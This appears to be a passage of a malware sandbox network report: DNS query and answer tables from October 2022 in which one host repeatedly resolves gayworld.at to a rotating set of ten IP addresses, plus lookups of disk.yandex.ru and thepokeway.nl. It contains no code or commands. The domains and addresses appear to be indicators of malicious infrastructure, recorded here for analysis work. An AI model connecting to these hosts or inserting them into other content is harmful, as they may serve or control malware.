                  Oct 10, 2022 23:20:47.929007053 CEST192.168.2.58.8.8.80xd63Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:49.240762949 CEST192.168.2.58.8.8.80x8e1bStandard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:50.731925011 CEST192.168.2.58.8.8.80x2760Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.010096073 CEST192.168.2.58.8.8.80x45a6Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.717505932 CEST192.168.2.58.8.8.80x2bceStandard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.730608940 CEST192.168.2.58.8.8.80x4cc1Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.362374067 CEST192.168.2.58.8.8.80xa3d3Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.839795113 CEST192.168.2.58.8.8.80xb534Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.335756063 CEST192.168.2.58.8.8.80xab12Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:21.809776068 CEST192.168.2.58.8.8.80x3a8bStandard query (0)disk.yandex.ruA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.548635006 CEST192.168.2.58.8.8.80x86b3Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:24.031219006 CEST192.168.2.58.8.8.80xdfd0Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:25.518568039 CEST192.168.2.58.8.8.80x7cStandard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:27.173978090 CEST192.168.2.58.8.8.80xa459Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:28.682234049 CEST192.168.2.58.8.8.80xe8d9Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:30.186613083 CEST192.168.2.58.8.8.80x3506Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:31.682382107 CEST192.168.2.58.8.8.80x9f11Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:33.160562992 CEST192.168.2.58.8.8.80x14fdStandard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:35.344244957 CEST192.168.2.58.8.8.80x9c43Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:36.014451981 CEST192.168.2.58.8.8.80xc6a8Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:37.208271027 CEST192.168.2.58.8.8.80x7533Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:38.681834936 CEST192.168.2.58.8.8.80xa3daStandard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:39.953564882 CEST192.168.2.58.8.8.80x448dStandard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:40.651073933 CEST192.168.2.58.8.8.80x1a15Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:41.838558912 CEST192.168.2.58.8.8.80x82dStandard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:43.310672998 CEST192.168.2.58.8.8.80xa419Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:44.809214115 CEST192.168.2.58.8.8.80xa90eStandard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:46.289473057 CEST192.168.2.58.8.8.80xc715Standard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:47.778389931 CEST192.168.2.58.8.8.80xcdb0Standard query (0)thepokeway.nlA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:49.415697098 CEST192.168.2.58.8.8.80xc4aeStandard query (0)gayworld.atA (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:49.902825117 CEST192.168.2.58.8.8.80xc4fcStandard query (0)gayworld.atA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 10, 2022 23:20:40.449064016 CEST8.8.8.8192.168.2.50x32c6No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:40.449064016 CEST8.8.8.8192.168.2.50x32c6No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:40.449064016 CEST8.8.8.8192.168.2.50x32c6No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:40.449064016 CEST8.8.8.8192.168.2.50x32c6No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:40.449064016 CEST8.8.8.8192.168.2.50x32c6No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:40.449064016 CEST8.8.8.8192.168.2.50x32c6No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:40.449064016 CEST8.8.8.8192.168.2.50x32c6No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:40.449064016 CEST8.8.8.8192.168.2.50x32c6No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:40.449064016 CEST8.8.8.8192.168.2.50x32c6No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:40.449064016 CEST8.8.8.8192.168.2.50x32c6No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:42.280230999 CEST8.8.8.8192.168.2.50x3a9fNo error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:42.280230999 CEST8.8.8.8192.168.2.50x3a9fNo error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:42.280230999 CEST8.8.8.8192.168.2.50x3a9fNo error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:42.280230999 CEST8.8.8.8192.168.2.50x3a9fNo error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:42.280230999 CEST8.8.8.8192.168.2.50x3a9fNo error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:42.280230999 CEST8.8.8.8192.168.2.50x3a9fNo error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:42.280230999 CEST8.8.8.8192.168.2.50x3a9fNo error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:42.280230999 CEST8.8.8.8192.168.2.50x3a9fNo error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:42.280230999 CEST8.8.8.8192.168.2.50x3a9fNo error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:42.280230999 CEST8.8.8.8192.168.2.50x3a9fNo error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:43.880338907 CEST8.8.8.8192.168.2.50xed3aNo error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:43.880338907 CEST8.8.8.8192.168.2.50xed3aNo error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:43.880338907 CEST8.8.8.8192.168.2.50xed3aNo error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:43.880338907 CEST8.8.8.8192.168.2.50xed3aNo error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:43.880338907 CEST8.8.8.8192.168.2.50xed3aNo error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:43.880338907 CEST8.8.8.8192.168.2.50xed3aNo error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:43.880338907 CEST8.8.8.8192.168.2.50xed3aNo error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:43.880338907 CEST8.8.8.8192.168.2.50xed3aNo error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:43.880338907 CEST8.8.8.8192.168.2.50xed3aNo error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:43.880338907 CEST8.8.8.8192.168.2.50xed3aNo error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:44.574304104 CEST8.8.8.8192.168.2.50x4b84No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:44.574304104 CEST8.8.8.8192.168.2.50x4b84No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:44.574304104 CEST8.8.8.8192.168.2.50x4b84No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:44.574304104 CEST8.8.8.8192.168.2.50x4b84No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:44.574304104 CEST8.8.8.8192.168.2.50x4b84No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:44.574304104 CEST8.8.8.8192.168.2.50x4b84No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:44.574304104 CEST8.8.8.8192.168.2.50x4b84No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:44.574304104 CEST8.8.8.8192.168.2.50x4b84No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:44.574304104 CEST8.8.8.8192.168.2.50x4b84No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:44.574304104 CEST8.8.8.8192.168.2.50x4b84No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:45.752782106 CEST8.8.8.8192.168.2.50x78b4No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:45.752782106 CEST8.8.8.8192.168.2.50x78b4No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:45.752782106 CEST8.8.8.8192.168.2.50x78b4No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:45.752782106 CEST8.8.8.8192.168.2.50x78b4No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:45.752782106 CEST8.8.8.8192.168.2.50x78b4No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:45.752782106 CEST8.8.8.8192.168.2.50x78b4No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:45.752782106 CEST8.8.8.8192.168.2.50x78b4No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:45.752782106 CEST8.8.8.8192.168.2.50x78b4No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:45.752782106 CEST8.8.8.8192.168.2.50x78b4No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:45.752782106 CEST8.8.8.8192.168.2.50x78b4No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:46.663036108 CEST8.8.8.8192.168.2.50xc48dNo error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:46.663036108 CEST8.8.8.8192.168.2.50xc48dNo error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:46.663036108 CEST8.8.8.8192.168.2.50xc48dNo error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:46.663036108 CEST8.8.8.8192.168.2.50xc48dNo error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:46.663036108 CEST8.8.8.8192.168.2.50xc48dNo error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:46.663036108 CEST8.8.8.8192.168.2.50xc48dNo error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:46.663036108 CEST8.8.8.8192.168.2.50xc48dNo error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:46.663036108 CEST8.8.8.8192.168.2.50xc48dNo error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:46.663036108 CEST8.8.8.8192.168.2.50xc48dNo error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:46.663036108 CEST8.8.8.8192.168.2.50xc48dNo error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:47.948771954 CEST8.8.8.8192.168.2.50xd63No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:47.948771954 CEST8.8.8.8192.168.2.50xd63No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:47.948771954 CEST8.8.8.8192.168.2.50xd63No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:47.948771954 CEST8.8.8.8192.168.2.50xd63No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:47.948771954 CEST8.8.8.8192.168.2.50xd63No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:47.948771954 CEST8.8.8.8192.168.2.50xd63No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:47.948771954 CEST8.8.8.8192.168.2.50xd63No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:47.948771954 CEST8.8.8.8192.168.2.50xd63No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:47.948771954 CEST8.8.8.8192.168.2.50xd63No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:47.948771954 CEST8.8.8.8192.168.2.50xd63No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:49.260253906 CEST8.8.8.8192.168.2.50x8e1bNo error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:49.260253906 CEST8.8.8.8192.168.2.50x8e1bNo error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:49.260253906 CEST8.8.8.8192.168.2.50x8e1bNo error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:49.260253906 CEST8.8.8.8192.168.2.50x8e1bNo error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:49.260253906 CEST8.8.8.8192.168.2.50x8e1bNo error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:49.260253906 CEST8.8.8.8192.168.2.50x8e1bNo error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:49.260253906 CEST8.8.8.8192.168.2.50x8e1bNo error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:49.260253906 CEST8.8.8.8192.168.2.50x8e1bNo error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:49.260253906 CEST8.8.8.8192.168.2.50x8e1bNo error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:49.260253906 CEST8.8.8.8192.168.2.50x8e1bNo error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:50.751605988 CEST8.8.8.8192.168.2.50x2760No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:50.751605988 CEST8.8.8.8192.168.2.50x2760No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:50.751605988 CEST8.8.8.8192.168.2.50x2760No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:50.751605988 CEST8.8.8.8192.168.2.50x2760No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:50.751605988 CEST8.8.8.8192.168.2.50x2760No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:50.751605988 CEST8.8.8.8192.168.2.50x2760No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:50.751605988 CEST8.8.8.8192.168.2.50x2760No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:50.751605988 CEST8.8.8.8192.168.2.50x2760No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:50.751605988 CEST8.8.8.8192.168.2.50x2760No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:20:50.751605988 CEST8.8.8.8192.168.2.50x2760No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.245279074 CEST8.8.8.8192.168.2.50x45a6No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.245279074 CEST8.8.8.8192.168.2.50x45a6No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.245279074 CEST8.8.8.8192.168.2.50x45a6No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.245279074 CEST8.8.8.8192.168.2.50x45a6No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.245279074 CEST8.8.8.8192.168.2.50x45a6No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.245279074 CEST8.8.8.8192.168.2.50x45a6No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.245279074 CEST8.8.8.8192.168.2.50x45a6No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.245279074 CEST8.8.8.8192.168.2.50x45a6No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.245279074 CEST8.8.8.8192.168.2.50x45a6No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.245279074 CEST8.8.8.8192.168.2.50x45a6No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.857969999 CEST8.8.8.8192.168.2.50x2bceNo error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.857969999 CEST8.8.8.8192.168.2.50x2bceNo error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.857969999 CEST8.8.8.8192.168.2.50x2bceNo error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.857969999 CEST8.8.8.8192.168.2.50x2bceNo error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.857969999 CEST8.8.8.8192.168.2.50x2bceNo error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.857969999 CEST8.8.8.8192.168.2.50x2bceNo error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.857969999 CEST8.8.8.8192.168.2.50x2bceNo error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.857969999 CEST8.8.8.8192.168.2.50x2bceNo error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.857969999 CEST8.8.8.8192.168.2.50x2bceNo error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:13.857969999 CEST8.8.8.8192.168.2.50x2bceNo error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:15.750191927 CEST8.8.8.8192.168.2.50x4cc1No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:17.379950047 CEST8.8.8.8192.168.2.50xa3d3No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:18.858844995 CEST8.8.8.8192.168.2.50xb534No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:20.353420973 CEST8.8.8.8192.168.2.50xab12No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:21.829123974 CEST8.8.8.8192.168.2.50x3a8bNo error (0)disk.yandex.ru87.250.250.50A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at211.171.233.129A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at151.251.24.5A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at190.122.162.239A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at195.158.3.162A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at185.95.186.58A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at222.232.238.243A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:22.566296101 CEST8.8.8.8192.168.2.50x86b3No error (0)gayworld.at211.171.233.126A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:24.050858021 CEST8.8.8.8192.168.2.50xdfd0No error (0)gayworld.at123.213.233.194A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:24.050858021 CEST8.8.8.8192.168.2.50xdfd0No error (0)gayworld.at181.110.91.40A (IP address)IN (0x0001)false
                  Oct 10, 2022 23:21:24.050858021 CEST8.8.8.8192.168.2.50xdfd0No error (0)gayworld.at175.120.254.9A (IP address)IN (0x0001)false
